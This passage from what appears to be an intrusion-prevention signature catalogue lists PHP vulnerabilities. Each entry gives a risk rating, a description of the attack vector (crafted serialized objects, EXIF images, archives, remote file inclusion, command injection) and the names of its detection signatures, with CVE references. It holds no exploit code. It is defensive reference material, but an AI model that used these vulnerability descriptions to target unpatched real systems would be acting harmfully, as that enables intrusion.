Situation: HTTP_CRL-Php-Dateinterval-Heap-Buffer-Overread-Denial-Of-Service
References:
CVE-2013-6712
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6712
BID-64018
http://www.securityfocus.com/bid/64018
OSVDB-100440
http://www.osvdb.org/100440
Back to top

Php-Datetimezone-Object-Timezone-Unserialize-Type-Confusion

About this vulnerability: A vulnerability in PHP
Risk: High
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: A code execution vulnerability has been reported in PHP. The vulnerability is due to a type confusion error when handling serialized DateTimeZone objects within the unserialize() function. A remote attacker can exploit the vulnerability by sending crafted serialized data to a web application running a vulnerable version of PHP. A successful attack will result in remote code execution under the context of the service running PHP.
Situation: HTTP_CRL-Php-Datetimezone-Object-Timezone-Unserialize-Type-Confusion
Back to top

Php-DNS_Get_Record-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in PHP
Risk: High
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: An out-of-bounds read vulnerability has been reported in PHP. The vulnerability is due to improper handling of malformed DNS responses. A remote attacker could exploit this vulnerability by sending a crafted DNS response to a vulnerable server. Successful exploitation could lead to information disclosure or crash of the PHP application.
Situation: DNS-TCP_Php-DNS_Get_Record-Out-Of-Bounds-Read
DNS-UDP_Php-DNS_Get_Record-Out-Of-Bounds-Read
References:
CVE-2019-9022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9022
Back to top

PHP-Exception-Tostring-Denial-Of-Service

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-846-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Infinite Loop
Description: A denial of service condition caused by improper deserialization on PHP can be triggered by a crafted serialized object that refers to itself in the __toString method.
Situation: File-Text_PHP-Exception-Tostring-Denial-Of-Service
References:
CVE-2016-7478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7478
BID-95150
http://www.securityfocus.com/bid/95150
Back to top

Php-EXIF-Extension-EXIF_Read_Data-Null-Pointer-Dereference

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: A code execution vulnerability exists in PHP's exif extension. The vulnerability is due to a NULL Pointer dereference inside the exif_read_data function. A remote attacker can exploit this vulnerability by sending crafted picture data to a web application running a vulnerable version of PHP. A successful attack will crash the application, and possibly result in remote code execution.
Situation: File-JPEG_Php-EXIF-Extension-EXIF_Read_Data-Null-Pointer-Dereference
References:
CVE-2015-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232
OSVDB-117467
http://www.osvdb.org/117467
Back to top

Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: A code execution vulnerability exists in PHP exif extension. The vulnerability is due to a buffer overflow when handles exif thumbnail. A remote attacker can exploit the vulnerability by sending crafted picture data to a web application running a vulnerable version of PHP. A successful attack will crash the application, and possibly result in remote code execution.
Situation: HTTP_CS-Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow
File-Binary_Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow
References:
CVE-2014-3670
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670
BID-70665
http://www.securityfocus.com/bid/70665
OSVDB-113421
http://www.osvdb.org/113421
Back to top

Php-EXIF-Header-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported in PHP. The vulnerability is due to a lack of validation on EXIF data read from a file. A remote attacker could exploit this vulnerability in web applications using this functionality. A successful attack could result in information disclosure or a denial-of-service condition.
Situation: HTTP_CS-Php-EXIF-Header-Parsing-Integer-Overflow
References:
CVE-2011-4566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4566
BID-50907
http://www.securityfocus.com/bid/50907
OSVDB-77446
http://www.osvdb.org/77446
Back to top

PHP-EXIF_Process_User_Comment-Null-Pointer-Dereference

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-786-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: A null pointer dereference in the Exif module of PHP results in a vulnerability, which can be exploited to cause a denial of service condition.
Situation: File-JPEG_PHP-EXIF_Process_User_Comment-Null-Pointer-Dereference
References:
CVE-2016-6292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6292
Back to top

Php-Fileinfo-Call-Stack-Exhaustion-Denial-Of-Service

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in PHP Fileinfo. The vulnerability is due to call stack exhaustion when mget handles a magic string. A remote attacker can exploit this flaw by sending a malicious request. Successful exploitation could result in a denial of service condition.
Situation: HTTP_CS-Php-Fileinfo-Call-Stack-Exhaustion-Denial-Of-Service
References:
CVE-2014-1943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943
OSVDB-103424
http://www.osvdb.org/103424
Back to top

Php-Fileinfo-CDF_Read_Property_Info-Denial-Of-Service

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Integer Overflow
Description: A denial of service vulnerability exists in PHP. It is due to an integer overflow error in the FileInfo module while processing CDF files. This vulnerability exists because of an incomplete fix for CVE-2012-1571 A remote attacker can exploit the vulnerability by sending crafted CDF files to a web application running a vulnerable version of PHP. A successful attack will crash the application, which can cause a denial of service condition.
Situation: HTTP_CS-Php-Fileinfo-CDF_Read_Property_Info-Denial-Of-Service
References:
CVE-2014-3587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587
BID-69325
http://www.securityfocus.com/bid/69325
OSVDB-79681
http://www.osvdb.org/79681
Back to top

PHP-FPM-Init_request_info-Path_Info-Buffer-Underflow

About this vulnerability: A vulnerability in PHP
Risk: Moderate
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: There exists a pre-auth remote code execution vulnerability in the PHP FPM. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CSU-PHP-FPM-Init_request_info-Path_Info-Buffer-Underflow
References:
CVE-2019-11043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11043
Back to top

Php-FTP_genlist-Method-Integer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Integer Overflow
Description: A code execution vulnerability exists in PHP's ftp_genlist() method. The vulnerability is due to lack of integer overflow detection when calculating the size of the response to the FTP LIST command. A remote attacker can exploit the vulnerability by hosting an FTP server and sending crafted data to a web application running a vulnerable version of PHP. Successful exploitation could lead to arbitrary code execution under the security context of the web application.
Situation: FTP_DI-Php-FTP_genlist-Method-Integer-Overflow
References:
CVE-2015-4022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022
OSVDB-122126
http://www.osvdb.org/122126
Back to top

PHP-Fusion-Administration-Banner-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in PHP-Fusion.
Risk: Moderate
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP-Fusion
Type: Input Validation
Description: A stored cross-site scripting vulnerability exist in PHP-Fusion Banner feature. The vulnerability is due to improper validation of user input in HTTP requests. A remote authenticated attacker can exploit the vulnerability by sending a crafted request to the vulnerable server. Successful exploitation could result in arbitrary script code execution in the target user's browser.
Situation: HTTP_CS-PHP-Fusion-Administration-Banner-Stored-Cross-Site-Scripting
References:
CVE-2020-12438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12438
Back to top

PHP-Fusion-Downloads.php-Command-Injection

About this vulnerability: A vulnerability in PHP-Fusion
Risk: High
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1298-5242
Platform: Generic
Software: PHP-Fusion
Type: Input Validation
Description: A command injection vulnerability has been reported in PHP-Fusion. The vulnerability is due to insufficient validation of HTTP request parameters in downloads.php. A remote unauthenticated attacker could exploit this vulnerability by sending an crafted HTTP request to the vulnerable server. Successful exploitation of this vulnerability could allow the attacker to execute command in the security context of the running server.
Situation: HTTP_CRL-PHP-Fusion-Downloads.php-Command-Injection
References:
CVE-2020-24949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24949
Back to top

PHP-Gdimagecreatefromgifctx-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: Improper parsing of GIF files causes an out of bounds read vulnerability in PHP. A successful exploit allows potentially sensitive information to be disclosed.
Situation: File-GIF_PHP-Gdimagecreatefromgifctx-Out-Of-Bounds-Read
References:
CVE-2017-7890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7890
Back to top

Php-Group-Php-Zip-Integer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1618-5242
Platform: Generic
Software: PHP
Type: Integer Overflow
Description: A heap buffer overflow vulnerability exists in PHP. The vulnerability is due to an integer overflow in the libzip component of PHP and can be used to write beyond the end of a heap buffer. A remote attacker can exploit the vulnerability by sending a crafted ZIP archive to a web application running a vulnerable version of PHP. A successful attack will result in remote code execution under the context of the service running PHP.
Situation: File-Zip_Php-Group-Php-Zip-Integer-Overflow
References:
CVE-2015-2331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
Back to top

Php-Htmlspecialchars-Htmlentities-Buffer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in PHP. The vulnerability is due to an error while processing numeric entities by the htmlspecialchars and htmlentities PHP functions. A remote attacker could exploit this vulnerability by sending a malicious request to a web application that uses these functions. A successful attack attempt could result in the execution of arbitrary code in the security context of the HTTP service, which is normally user "nobody" for Apache on Linux. Configurations where the HTTP server runs as root or SYSTEM are uncommon.
Situation: HTTP_CRL-Php-Htmlspecialchars-Htmlentities-Buffer-Overflow
References:
BID-51860
http://www.securityfocus.com/bid/51860
Back to top

PHP-HTTP-Multipart-Form-Data-Denial-Of-Service

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Resource Starvation
Description: A resource exhaustion vulnerability exists in PHP. This vulnerability is due to PHP incorrectly handling HTTP multipart/form-data. A remote attacker can exploit this vulnerability by sending multiple crafted requests to a vulnerable server application running PHP. Successful exploitation could lead to consumption of large amounts of system resources, resulting in a denial of service condition.
Situation: HTTP_CSH-PHP-HTTP-Multipart-Form-Data-Denial-Of-Service
References:
CVE-2015-4024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024
BID-74903
http://www.securityfocus.com/bid/74903
Back to top

Php-HTTP-POST-File-Upload-Buffer-Overflow

About this vulnerability: Buffer overflow in PHP multipart/form-data HTTP POST request handling
Risk: Moderate
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: PHP versions prior to 4.2.0 are vulnerable to a buffer overflow vulnerability in the handling of file uploads. By using the HTTP POST method to upload a PHP form containing specially-crafted MIME-encoded data, a remote attacker can overflow a buffer and execute arbitrary code on the Web server with elevated privileges.
Situation: HTTP_CS-Php-POST-File-Upload-Buffer-Overflow
References:
CVE-2002-0081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0081
BID-4183
http://www.securityfocus.com/bid/4183
OSVDB-720
http://www.osvdb.org/720
Back to top

PHP-HTTP_Fopen_Wrapper-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-1054-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: Improper parsing of HTTP responses causes a stack buffer overflow vulnerability in PHP. A successful exploit allows a remote attacker to execute arbitrary code with the privileges of the PHP process.
Situation: HTTP_SHS-PHP-HTTP_Fopen_Wrapper-Stack-Buffer-Overflow
References:
CVE-2018-7584
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7584
Back to top

PHP-IMAP-Open-RCE

About this vulnerability: A vulnerability in University of Washington IMAP
Risk: High
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: University of Washington imapd
Type: Input Validation
Description: There exists a vulnerability in University of Washington IMAP Toolkit 2007f which allows remote attackers to execute arbitrary code due to the lack of input validation to the hostname parameter.
Situation: HTTP_CRL-PHP-IMAP-Open-RCE
References:
CVE-2018-19518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19518
Back to top

Php-LDAP-Denial-Of-Service

About this vulnerability: A vulnerability in PHP
Risk: High
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: A denial of service vulnerability has been reported in PHP. The vulnerability is due to a NULL pointer dereference in ldap_get_dn() when performing LDAP queries. A remote attacker that runs a malicious LDAP server or a man-in-the-middle attacker could exploit this vulnerability by sending maliciously crafted data to the PHP application. Successful exploitation of this vulnerability could lead to denial of service.
Situation: LDAP_SS-Php-LDAP-Denial-Of-Service
References:
CVE-2018-10548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10548
Back to top

Php-Libmagic-Portable-Executable-Out-Of-Bounds-Memory-Access

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: An out-of-bound memory access vulnerability exists in PHP Libmagic. The vulnerability is due to the way the file utility determines the type of Portable Executable (PE) format files. A remote attacker can exploit this flaw by uploading a malicious PE file to a vulnerable server. Successful exploitation could allow the attacker to execute arbitrary code, or result in a denial of service condition.
Situation: HTTP_CS-Php-Libmagic-Portable-Executable-Out-Of-Bounds-Memory-Access
References:
CVE-2014-2270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270
OSVDB-104081
http://www.osvdb.org/104081
Back to top

Php-Memory-Limit-Code-Execution-Vulnerability

About this vulnerability: Arbitrary code execution vulnerability in PHP memory_limit
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: There is a vulnerability in the way PHP aborts from a memory allocation which exceeds the memory limit. This operation is unsafe during the allocation and initialization of hash table elements. It is possible for an attacker to take control of a memory pointer and execute arbitrary code on the target. When PHP reaches its memory limit constraint, it will start a request shutdown. If logging is enabled, an error message will be sent to the error log file. If remote logging is enabled, error messages will be sent in the payload response of the PHP script. The HTTP request is terminated. If this has occurred during the allocation of hash table elements, certain members of these elements may be incorrectly initialized. If the attacker has gained control of the destructor function pointer, he may be able to execute arbitrary code on the target with the privileges of the Apache server. The behaviour of the target is dependent on the malicious code.
Situation: HTTP_CS-Php-Memory_Limit-Vulnerability
HTTP_SHS-Vulnerable-Php-4.3.7
References:
CVE-2004-0594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0594
BID-10725
http://www.securityfocus.com/bid/10725
OSVDB-7870
http://www.osvdb.org/7870
Back to top

Php-Nuke-Referer-SQL-Injection

About this vulnerability: SQL Injection Attack Tool
Risk: High
First detected in: sgpkg-ips-344-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP-Nuke
Type: SQL Injection
Description: SQL injection vulnerability in index.php in Francisco Burzi PHP-Nuke 8.0 Final and earlier allows remote attackers to execute arbitrary SQL commands via the HTTP Referer header.
Situation: HTTP_CSH-SQL-Injection-In-Referer-Header-Field
References:
CVE-2007-1061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1061
BID-22638
http://www.securityfocus.com/bid/22638
OSVDB-33316
http://www.osvdb.org/33316
Back to top

Php-Nuke-SQL-Injection

About this vulnerability: A vulnerability in PHP-Nuke
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP-Nuke
Type: SQL Injection
Description: PHP-Nuke is an Internet/Intranet Content Management System (CMS) written in PHP. There are multiple SQL injection vulnerabilities in its code that allow a remote attacker to execute SQL statements of his choice.
Situation: HTTP_CSU-Php-Nuke-SQL-Injection
Back to top

Php-OLE-File-Handling-Infinite-Loop

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Infinite Loop
Description: A denial of service vulnerability has been reported in PHP. It is due to an error in the FileInfo module while handling nelements in the processing of CDF files. A remote attacker can exploit the vulnerability by sending crafted CDF files to a web application running a vulnerable version of PHP. A successful attack will result in an infinite loop, which can cause a denial of service condition.
Situation: HTTP_CS-Php-OLE-File-Handling-Infinite-Loop
File-OLE_Php-OLE-File-Handling-Infinite-Loop
References:
CVE-2014-0238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238
Back to top

PHP-Payloads-Injected-In-PNG-Image

About this vulnerability: A suspicious PNG image containing PHP payloads detected
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: This fingerprint detects PNG images that contain PHP payloads. Such images could be used to perform remote code execution on vulnerable PHP applications.
Situation: File-PNG_PHP-Payloads-Injected-In-PNG-Image
Back to top

Php-PECL-Zip-URL-Wrapper-Buffer-Overflow

About this vulnerability: Buffer Overflow Vulnerability in PHP Extension Community Library Zip management
Risk: Moderate
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: A vulnerability exists in older versions of PHP and in PHP Extension Community Library (PECL) zip management extension which could be exploited by remote attackers to execute code on a vulnerable system. The vulnerability is due to a boundary error in the processing of excessively long "zip://" URL wrappers. Remote attackers could exploit this vulnerability by persuading unsuspecting users to visit a site that uses a PHP application to open specially crafted "zip://" URLs. Successful exploitation would cause a stack based buffer overflow that could cause a denial of service, or allow the attacker to execute code on the vulnerable system.
Situation: File-Text_Php-PECL-Zip-URL-Wrapper-Buffer-Overflow
Back to top

PHP-Phar-404-Page-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Input Validation
Description: Improper sanitation of .phar file names when generating 404 response pages for missing files causes a cross-site scripting vulnerability in PHP. A successful exploit allows an attacker to run arbitrary code in an user's web browser.
Situation: HTTP_CRL-PHP-Phar-404-Page-Reflected-Cross-Site-Scripting
References:
CVE-2018-5712
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5712
Back to top

Php-Phar_Parse_pharfile-Function-Filename_Len-Property-Integer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in PHP. A remote attacker could use this to generate a denial of service condition on the target system.
Situation: File-Text_Php-Phar_Parse_pharfile-Function-Filename_Len-Property-Integer-Overflow
References:
CVE-2016-10159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10159
Back to top

Php-Phar_Parse_Tarfile-Method-Integer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-1719-5242
Platform: Generic
Software: PHP
Type: Integer Overflow
Description: An integer overflow vulnerability exists in PHP. The vulnerability is due to an issue with the parsing of TAR files by phar_parse_tarfile(). A remote attacker can exploit the vulnerability by sending crafted data to a web application running a vulnerable version of PHP. Successful exploitation could lead to the disclosure of sensitive information from the server.
Situation: File-Binary_Php-Phar_Parse_Tarfile-Method-Integer-Overflow
References:
CVE-2015-4021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021
Back to top

PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-662-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in PHP. The vulnerability is due to improper bounds checking when handling .tar, .phar or .zip archive in the phar_set_inode function. A remote unauthenticated attacker can exploit this vulnerability by providing a crafted .tar, .phar or .zip archive the the vulnerable application. Successful exploitation could lead to execution of arbitrary code under the security context of the process.
Situation: File-Binary_PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow
File-Text_PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow
References:
CVE-2015-3329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3329
BID-74240
http://www.securityfocus.com/bid/74240
Back to top

Php-Phpinfo-request

About this vulnerability: Request for phpinfo.php detected
Risk: Low
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Insecure Configuration
Description: Request for phpinfo.php was detected. It is generally not advised to serve web-pages disclosing server information to the public.
Situation: HTTP_CSU-Php-Phpinfo-request
File-Text_PHP-Test-Page-Transfer
Back to top

Php-Php_parserr-DNS-Txt-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: A heap buffer vulnerability exists in the php_parserr() function in PHP. The vulnerability is due to an error in parsing malformed DNS TXT records. An attacker can exploit this vulnerability if the application uses the vulnerable function. A successful attack can allow arbitrary code execution in the context of the PHP application. An unsuccessful attack will result in a denial of service condition.
Situation: DNS-UDP_Multiple-Vendors-DNS-Txt-Record-Parsing-Buffer-Overflow
References:
CVE-2014-4049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049
OSVDB-107994
http://www.osvdb.org/107994
Back to top

PHP-Php_Register_Variable_ex-Function-Code-Execution

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: There is a memory corruption vulnerability in PHP. The vulnerability is due to improper handling of an error condition in function php_register_variable_ex when the number of variables exceeds max_input_vars. When too many variables are encountered, the vulnerable PHP module is allowed to continue executing and might corrupt memory through an invalid pointer. A remote attacker could exploit this vulnerability in web applications that use this functionality, by sending a malicious request. A successful attack could result in arbitrary code execution in the context of the HTTP service, normally nobody for Apache on Linux. Configurations where the HTTP server with PHP runs as root or SYSTEM are uncommon, though possible.
Situation: HTTP_CS-Large-Number-Of-Parameters-In-POST-Request
References:
CVE-2012-0830
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0830
BID-51830
http://www.securityfocus.com/bid/51830
OSVDB-78819
http://www.osvdb.org/78819
Back to top

Php-Probe-Script

About this vulnerability: Probe script
Risk: High
First detected in: sgpkg-ips-369-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Any Software
Type: Post Compromise Behaviour
Description: PHP probe is a script that is often used to determine wheter an exploitation was successful or not. If such scripts are detected from a network, especially if the file is being downloaded to a web server may indicate an ongoing attack.
Situation: HTTP_SS-Php-Probe-Script
File-Text_Php-Probe-Script
Back to top

Php-Quot-Print-Encode-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: There is a heap buffer vulnerability in php_quot_print_encode() function in PHP. The vulnerability is due to an error in parsing strings passed to the function. An attacker can exploit this vulnerability if the application uses the vulnerable function. A successful attack can allow arbitrary code execution in the context of the PHP application. An unsuccessful attack will result in a denial of service condition.
Situation: HTTP_CRL-Php-Quot-Print-Encode-Heap-Buffer-Overflow
References:
CVE-2013-2110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2110
BID-60411
http://www.securityfocus.com/bid/60411
OSVDB-94063
http://www.osvdb.org/94063
Back to top

PHP-Remote-File-Inclusion

About this vulnerability: An attempt to exploit a remote file inclusion vulnerability detected
Risk: High
First detected in: sgpkg-ips-1054-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: Remote file inclusion vulnerability could allow a remote attacker to include a file to be executed in a target server. This could lead to system compromise of the target server.
Situation: HTTP_CSU-PHP-Remote-File-Inclusion
Back to top

Php-Reserved-Variable-In-Request

About this vulnerability: Reserved variable in HTTP request
Risk: High
First detected in: sgpkg-ips-199-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Input Validation
Description: PHP is a scripting language used in web servers for server-side applications. The language defines a set of reserved variables. Use of these variables in a request may indicate an exploit attempt.
Situation: HTTP_CRL-Php-Reserved-Server-Variable-In-Request
Back to top

Php-Script-External-Command-Execution

About this vulnerability: PHP script executes external commands
Risk: Moderate
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Code Injection
Description: PHP is a scripting language used especially on web servers. The language allows execution of external commands and many automated exploit tools against various PHP vulnerabilities attempt to download scripts that execute external tools.
Situation: HTTP_SS-Php-Script-External-Command-Execution-Download
File-Text_Php-Script-External-Command-Execution-Download-2
File-Text_Php-Script-External-Command-Execution-Download
Back to top

Php-Suspicious-Include-Parameter

About this vulnerability: Vulnerability in various PHP scripts
Risk: High
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Input Validation
Description: There is a common vulnerability in various scripts written with PHP scripting language where the parameters passed in the URI are not properly sanitized allowing remote file inclusion and execution in the context of the web server.
Situation: HTTP_CSU-Php-Suspicious-Path-Parameter
HTTP_CSU-Php-Suspicious-Include-Parameter
HTTP_CSU-Php-Suspicious-Root-Parameter
HTTP_CSU-Php-Suspicious-Go-Parameter
HTTP_CSU-Php-Suspicious-Site-Parameter
HTTP_CSU-Php-Suspicious-Basedir-Parameter
HTTP_CSU-Php-Suspicious-Absolute-Path-Parameter
HTTP_CSU-Php-Suspicious-Document-Root-Parameter
HTTP_CSU-Php-Suspicious-External-Parameter-Reference
HTTP_CSU-Server-Side-Scripting-Suspicious-External-Parameter-Reference
HTTP_CSU-Server-Side-Scripting-Suspicious-External-Text-File-Reference
HTTP_CSU-Php-Injection-Attack
Back to top

Php-Tar-File-Parsing-Uninitialized-Reference

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: A vulnerability in PHP, versions before 5.6.18 and 7.x before 7.0.3, which allows remote attackers to cause a denial of service condition, or possibly execute arbitrary code, via a crafted tar file.
Situation: File-Binary_Php-Tar-File-Parsing-Uninitialized-Reference
References:
CVE-2016-4343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4343
Back to top

Php-Unserialize-Call-Spl-Arrayobject-And-Splobjectstorage-Memory-Corruption

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: A memory corruption vulnerability exists in PHP. The vulnerability is due to type confusion in the unserialize() function for SPL ArrayObject and SPLObjectStorage. An attacker can exploit this vulnerability if the application uses the vulnerable function. A successful attack can allow arbitrary code execution in the context of the PHP application. An unsuccessful attack will result in a denial of service condition.
Situation: HTTP_CRL-Php-Unserialize-Call-Spl-Arrayobject-And-Splobjectstorage-Memory-Corruption
References:
CVE-2014-3515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515
OSVDB-108462
http://www.osvdb.org/108462
Back to top

Php-Xml_Parse_Into_Struct-Heap-Memory-Corruption

About this vulnerability: A vulnerability in PHP Group PHP
Risk: High
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
